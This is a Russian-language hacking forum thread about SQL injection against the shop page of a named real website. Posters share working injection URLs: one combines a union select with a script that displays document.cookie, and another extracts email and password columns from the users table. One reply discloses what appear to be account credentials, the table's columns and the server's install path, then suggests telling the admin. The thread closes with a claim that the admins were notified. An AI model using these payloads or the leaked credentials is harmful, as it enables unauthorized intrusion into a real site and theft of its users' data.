Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
sql-inj на islam.ru
 
Можно ли сделать что либо более серьезное?
http://www.islam.ru/shop/index.php?sample=266&good=50&cat=-1+union+select+1,1,1,1,%3Cscript%3Ealert(document.cookie)%3C/script%3E
В частности,обойти фильтрацию?
 
В принципе да, вот, немного посидев и покапавшись удалось выяснить немного:  
имя одной таблицы(users) и
две основных колонки(password, email)
http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*
Но возникли траблы с выводом, пока руки не дошли, так что дальше давай сам ;)
 
Спасибо,поработаю. ;)
 
Во-первых, что ты имеешь против ислама?
Во-вторых, rinat:123 и master:m741852963.
Поля таблицы users - id,nick,password,email.
Установочный путь  - /usr/home/islam/domains/islam.ru/public_html/shop/index.php.

Лучше просто сообщи админу о багах.
 
Цитата
logos пишет:
Лучше просто сообщи админу о багах.
правильно! уверен fowl как раз это и сделает
;)
 
Порядок.Админы оповещены.
ps. Logos,ты зверь ;)
Страницы: 1
Читают тему (гостей: 1)